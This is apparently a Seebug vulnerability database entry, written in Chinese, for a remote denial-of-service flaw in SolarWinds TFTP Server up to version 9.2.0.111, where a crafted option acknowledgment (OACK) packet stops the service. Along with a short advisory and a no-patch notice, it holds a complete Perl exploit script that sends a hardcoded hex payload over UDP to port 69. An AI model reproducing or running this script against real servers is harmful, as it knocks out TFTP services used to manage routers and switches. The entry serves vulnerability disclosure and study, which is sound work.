SolarWinds TFTP Server OACK请求拒绝服务漏洞

2009-09-02T00:00:00
ID SSV:12169
Type seebug
Reporter Root
Modified 2009-09-02T00:00:00

Description

BUGTRAQ ID: 36182

SolarWinds TFTP服务程序可以同时发送和接收多个文件,常用于下载/上传路由器、交换机等可执行映象和配置文件。

远程攻击者可以通过向SolarWinds TFTP服务器发送特制的选项确认(OACK)请求报文导致服务器终止。

SolarWinds TFTP Server <= 9.2.0.111 厂商补丁:

SolarWinds

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://solarwinds.net

                                        
                                            
                                                #!/usr/bin/perl
# SolarWinds TFTP Server &lt;=9.2.0.111 Remote DoS Exploit
# by Gaurav Baruah
# TFTP Server Service stops after payload
# is sent, and has to be started again in Config
# Tested on XP SP3
# Big thnx: dragunov
# Greetz: Sanjay

use IO::Socket;
$port = &quot;69&quot;;
$host = &quot;127.0.0.1&quot;;
$tftpudp = IO::Socket::INET-&gt;new(PeerPort =&gt; $port,PeerAddr =&gt; $host,Proto=&gt; 'udp');
$boom=
&quot;\x00\x06\x54\x9d\x68\x21\xde\x59\x30\x9a\x0b\xb5\xd4\x94\x94\x42\x3c\xeb\xc5&quot;.
&quot;\xc1\xe8\x7d\x31\x34\xee\xd8\x60\x41\x8f\x92\x25\x9c\x5c\xcc\x78\x6a&quot;;
$tftpudp-&gt;send($boom);